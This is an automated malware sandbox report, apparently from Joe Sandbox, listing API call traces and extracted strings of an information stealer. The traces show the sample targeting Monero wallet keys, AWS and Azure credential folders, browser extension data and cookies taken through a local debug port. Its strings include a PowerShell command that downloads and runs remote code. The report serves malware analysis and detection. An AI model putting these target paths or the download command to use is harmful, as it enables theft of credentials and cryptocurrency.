                              • Part of subcall function 00B01120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00B01159
                              • Part of subcall function 00B01120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00B01173
                              • Part of subcall function 00B01120: RegCloseKey.ADVAPI32(?), ref: 00B0117D
                            • lstrcat.KERNEL32(?,00000000), ref: 00B011C0
                            • lstrlen.KERNEL32(?), ref: 00B011CD
                            • lstrcat.KERNEL32(?,.keys), ref: 00B011E8
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0121F
                            • lstrlen.KERNEL32(01878C38), ref: 00B0122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01251
                            • lstrcat.KERNEL32(00000000,01878C38), ref: 00B01259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00B01264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00B01294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B012BA
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B012FF
                            • lstrlen.KERNEL32(0187D280), ref: 00B0130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01335
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01378
                            • lstrcat.KERNEL32(00000000), ref: 00B01385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B013AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00B013D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01401
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0143D
                              • Part of subcall function 00B1EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00B1EE12
                            • DeleteFileA.KERNEL32(?), ref: 00B01471
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: 5313b5c294aa0653ccb4c3b20130999905ada7c95cf160153c2edc8ad34ac1b6
                            • Instruction ID: 32a34c06f699e8dbb2c27ae63e411d7d8331ea7e03b29f9ab23538b1151ffece
                            • Opcode Fuzzy Hash: 5313b5c294aa0653ccb4c3b20130999905ada7c95cf160153c2edc8ad34ac1b6
                            • Instruction Fuzzy Hash: C8A13D71A11715ABCB25EF78DD89A9EBBF9EF44300F0444A4F905E7291DB34ED098BA0
                            APIs
                            • memset.MSVCRT ref: 00B1E740
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B1E769
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E79F
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E7AD
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00B1E7C6
                            • memset.MSVCRT ref: 00B1E805
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B1E82D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E85F
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E86D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00B1E886
                            • memset.MSVCRT ref: 00B1E8C5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B1E8F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E920
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E92E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B1E947
                            • memset.MSVCRT ref: 00B1E986
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: bf673c6198e6ec7308e84337fac6602b0f6b2fe48f506cfa3e7c2f183c8db8a0
                            • Instruction ID: 674831daa9a859ccc16afac15be99b0fa27cb9d9f3c7278f8d28d2f2ca8179e9
                            • Opcode Fuzzy Hash: bf673c6198e6ec7308e84337fac6602b0f6b2fe48f506cfa3e7c2f183c8db8a0
                            • Instruction Fuzzy Hash: 4671D971A40218ABDB25EB64DC4AFED77B4EF48700F5404E4B619DB1D0DFB0AE888B64
                            APIs
                            • lstrcpy.KERNEL32 ref: 00B1ABCF
                            • lstrlen.KERNEL32(0187E9C0), ref: 00B1ABE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AC0D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AC41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AC84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1ACB7
                            • lstrlen.KERNEL32(00B34AD4), ref: 00B1ACD1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1ACF3
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B1ACFF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AD28
                            • lstrlen.KERNEL32(00B34AD4), ref: 00B1AD3A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AD5C
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B1AD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AD91
                            • lstrlen.KERNEL32(0187EA20), ref: 00B1ADA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1ADCF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1ADDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AE03
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1AE3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1AE49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AE6F
                            • lstrlen.KERNEL32(00000000), ref: 00B1AE85
                            • lstrcpy.KERNEL32(00000000,0187EC48), ref: 00B1AEB8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID: f
                            • API String ID: 2762123234-1993550816
                            • Opcode ID: 3e68f2e7c31fc7a1d414c1750f8d9c8b534a3e9ab568400d632ad72c1b77e32c
                            • Instruction ID: 4d530c712ad324fa03bc1721a9dfa5ac6cfc8e1ed62b3e6f2d83a6e4909fe48f
                            • Opcode Fuzzy Hash: 3e68f2e7c31fc7a1d414c1750f8d9c8b534a3e9ab568400d632ad72c1b77e32c
                            • Instruction Fuzzy Hash: 88B15F31A126169BCB21EB68DC49AAFBBF5FF40300F4404B4B815E7291DB74ED49CBA1
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,00B172A4), ref: 00B247E6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 00B247FC
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00B2480D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00B2481E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 00B2482F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00B24840
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00B24851
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00B24862
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00B24873
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00B24884
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00B24895
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: 148b24d65c7e7c67b3f57d10d6c1708b5fd22dee9e60f1d3df58f57e4c8b3302
                            • Instruction ID: 1679140009b949aa2fee2d941b3c2e22bc4e002acf4b1b3de87644c56b898626
                            • Opcode Fuzzy Hash: 148b24d65c7e7c67b3f57d10d6c1708b5fd22dee9e60f1d3df58f57e4c8b3302
                            • Instruction Fuzzy Hash: 53113976962B20AFC3249FB5AD1DA967BF8BA09706718085AF441F2374DBF54000EBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1BE53
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1BE86
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00B1BE91
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1BEB1
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00B1BEBD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1BEE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1BEEB
                            • lstrlen.KERNEL32(')"), ref: 00B1BEF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1BF13
                            • lstrcat.KERNEL32(00000000,')"), ref: 00B1BF1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1BF46
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00B1BF66
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1BF88
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00B1BF94
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1BFBA
                            • ShellExecuteEx.SHELL32(?), ref: 00B1C00C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: 85be7555b8bb540a60dc45f4983a844d1481b13eb872bc0e463a0f20b5850995
                            • Instruction ID: 3c0519a44a073928f7df8425aac7eac4b2af24f1058bf9c7039bcc5b9bb3a685
                            • Opcode Fuzzy Hash: 85be7555b8bb540a60dc45f4983a844d1481b13eb872bc0e463a0f20b5850995
                            • Instruction Fuzzy Hash: 5D619331A107159BCB21AFB99C8DAEEBFE8EF45300F4404B9F405E3251DB74D94A8BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B2184F
                            • lstrlen.KERNEL32(01867080), ref: 00B21860
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21887
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21892
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B218C1
                            • lstrlen.KERNEL32(00B34FA0), ref: 00B218D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B218F4
                            • lstrcat.KERNEL32(00000000,00B34FA0), ref: 00B21900
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B2192F
                            • lstrlen.KERNEL32(01866F10), ref: 00B21945
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B2196C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21977
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B219A6
                            • lstrlen.KERNEL32(00B34FA0), ref: 00B219B8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B219D9
                            • lstrcat.KERNEL32(00000000,00B34FA0), ref: 00B219E5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21A14
                            • lstrlen.KERNEL32(01867090), ref: 00B21A2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21A51
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21A5C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21A8B
                            • lstrlen.KERNEL32(01866F20), ref: 00B21AA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21AC8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21AD3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21B02
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 43bc4b2e8f526617105ce95c3bfc2ab883be52fed5ab1fbe6aeac66d43b9a586
                            • Instruction ID: d95dcff8ffc333f4fa605004dd6b6528e0ff5a1a042b72f97fe7f8c46bb5ad09
                            • Opcode Fuzzy Hash: 43bc4b2e8f526617105ce95c3bfc2ab883be52fed5ab1fbe6aeac66d43b9a586
                            • Instruction Fuzzy Hash: 0D912E716017179FDB209FB9EC98A16B7E8EF54300B1448B8B89AD7391DB74E845CB60
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14793
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00B147C5
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B14812
                            • lstrlen.KERNEL32(00B34B60), ref: 00B1481D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1483A
                            • lstrcat.KERNEL32(00000000,00B34B60), ref: 00B14846
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1486B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14898
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B148A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B148CA
                            • StrStrA.SHLWAPI(?,00000000), ref: 00B148DC
                            • lstrlen.KERNEL32(?), ref: 00B148F0
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B14931
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B149B8
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B149E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14A0A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14A30
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14A5D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: 746f3f250101fdff82e8cb3d72178fc28262b78ebbf422d13367466401ea76cf
                            • Instruction ID: 019ad1f147ae14648dbf8d68a6d44f29c6be2d7410a303a866e0a8eb7296ae4e
                            • Opcode Fuzzy Hash: 746f3f250101fdff82e8cb3d72178fc28262b78ebbf422d13367466401ea76cf
                            • Instruction Fuzzy Hash: EDB18C71A116069BCB21EF78D8899AE7BE9EF44700F4545B8F846E7391DB30EC498B90
                            APIs
                              • Part of subcall function 00B090C0: InternetOpenA.WININET(00B2CFEC,00000001,00000000,00000000,00000000), ref: 00B090DF
                              • Part of subcall function 00B090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00B090FC
                              • Part of subcall function 00B090C0: InternetCloseHandle.WININET(00000000), ref: 00B09109
                            • strlen.MSVCRT ref: 00B092E1
                            • strlen.MSVCRT ref: 00B092FA
                              • Part of subcall function 00B08980: std::_Xinvalid_argument.LIBCPMT ref: 00B08996
                            • strlen.MSVCRT ref: 00B09399
                            • strlen.MSVCRT ref: 00B093E6
                            • lstrcat.KERNEL32(?,cookies), ref: 00B09547
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B09559
                            • lstrcat.KERNEL32(?,?), ref: 00B0956A
                            • lstrcat.KERNEL32(?,00B34B98), ref: 00B0957C
                            • lstrcat.KERNEL32(?,?), ref: 00B0958D
                            • lstrcat.KERNEL32(?,.txt), ref: 00B0959F
                            • lstrlen.KERNEL32(?), ref: 00B095B6
